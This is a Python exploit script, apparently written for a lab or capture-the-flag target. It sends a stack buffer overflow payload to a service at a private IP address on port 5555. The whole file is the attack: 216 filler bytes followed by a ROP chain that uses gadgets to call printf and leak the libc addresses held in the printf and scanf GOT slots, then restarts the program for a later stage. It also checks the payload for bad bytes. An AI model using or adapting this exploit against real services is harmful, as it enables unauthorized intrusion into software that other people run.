#!/usr/bin/env python3
from struct import pack,unpack
from telnetlib import Telnet
import socket
import sys
TARGET = ("192.168.43.115",5555) # Target IP and PORT
# Plain TCP client socket; it is created here at import time and only
# connected further down the script.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)# Make a TCP socket


def p64(x):
    """Pack the integer *x* into 8 bytes using struct's native ``"Q"`` layout.

    On the little-endian hosts this script is normally run from that is the
    little-endian encoding the original comment refers to.
    """
    return pack("Q", x)


def u64(x):
    """Inverse of :func:`p64`: turn 8 received bytes back into an ``int``."""
    value, = unpack("Q", x)
    return value
def checkTerms(term,payload): # function to check for any bad chars in payload.
    """Stop the script if the byte *term* occurs anywhere in *payload*.

    Args:
        term: a length-1 ``bytes`` value that the caller treats as a "bad
            char" (``ord`` requires exactly one byte).
        payload: the ``bytes`` buffer about to be sent.

    Prints the offending byte as hex and calls ``sys.exit(0)`` when it is
    present; otherwise returns ``None`` and the caller carries on.
    """
    if term not in payload:
        return
    # Report which byte clashed, then bail out before anything is sent.
    print("Found", hex(ord(term)), "in payload, exit.")
    sys.exit(0)
# --- Addresses inside the target binary ---------------------------------------
# All of these are absolute (0x40xxxx / 0x60xxxx), so the script presumes the
# target is mapped at a fixed base — presumably a non-PIE build; confirm.
# From a hardening point of view, PIE/ASLR on the binary and a stack protector
# are the mitigations this script presumes absent (not shown here — verify).
start = 0x400530        # where the chain jumps at the end ("start the program again")
printf_plt = 0x400500   # PLT stub for printf; used as the call target below
printf_got = 0x601018   # GOT slot for printf (per the name) — its contents get printed
scanf_got = 0x601028    # GOT slot for scanf (per the name) — likewise
perc_s = 0x400758       # per the name, a "%s" format string in the binary; used as 1st arg
pop_rdi = 0x400723      # gadget that pops the next chain value into rdi (see "goes to rdi")
pop_rsi_r15 = 0x400721  # gadget that pops the next two values into rsi and r15
# --- Payload --------------------------------------------------------------------
# bytes, not str, so it can be written to the socket under Python 3.
# 216 filler bytes: presumably the distance from the overflowed buffer to the
# saved return address; how the offset was found is not shown in this script.
buf = b'A'*216 # payload in bytes form for python3 to send through socket.
# First call: printf(perc_s, printf_got) — prints whatever printf's GOT slot
# holds, i.e. the address the loader resolved for it.
buf+= p64(pop_rdi)
buf+= p64(perc_s) # goes to rdi
buf+= p64(pop_rsi_r15)
buf+= p64(printf_got) # goes to rsi
buf+= p64(printf_got) # goes to r15 (filler: the gadget pops two registers)
buf+= p64(printf_plt)
# Second call: the same for scanf's GOT slot.
buf+= p64(pop_rdi)
buf+= p64(perc_s) # goes to rdi
buf+= p64(pop_rsi_r15)
buf+= p64(scanf_got) # goes to rsi
buf+= p64(scanf_got) # goes to r15 (filler)
buf+= p64(printf_plt)
buf+= p64(start) # start the program again.
# Bad-byte checks. A newline must not occur inside the chain (it is appended
# afterwards as the end-of-input marker); a space must not occur anywhere.
# Presumably the target reads its input with a whitespace-delimited scanf,
# which the scanf_got symbol above hints at — confirm against the binary.
checkTerms(b'\n',buf) # newline is a bad char if between payload.
buf+= b'\n' # add new line at end to enter input.
checkTerms(b'\x20',buf) # whitespace is a bad char.
print("[i] Payload ready.")
# --- Network I/O ----------------------------------------------------------------
s.connect(TARGET) # connect to target server
print(s.recv(1024)) # whatever the service prints first (banner/prompt), at most 1024 bytes
# NOTE(review): socket.send() may write fewer than len(buf) bytes and returns
# the count, which is discarded here; sendall() is the call that guarantees
# the whole buffer is written.
s.send(buf) # send payload
print("[i] Payload sent.")
# The raw reply is printed as-is; u64 (defined above) is never applied to it.
resp=s.recv(1024) # receive response.
print("[i] Reply received.")
print(resp)
# NOTE(review): the socket is never closed explicitly; it is released at exit.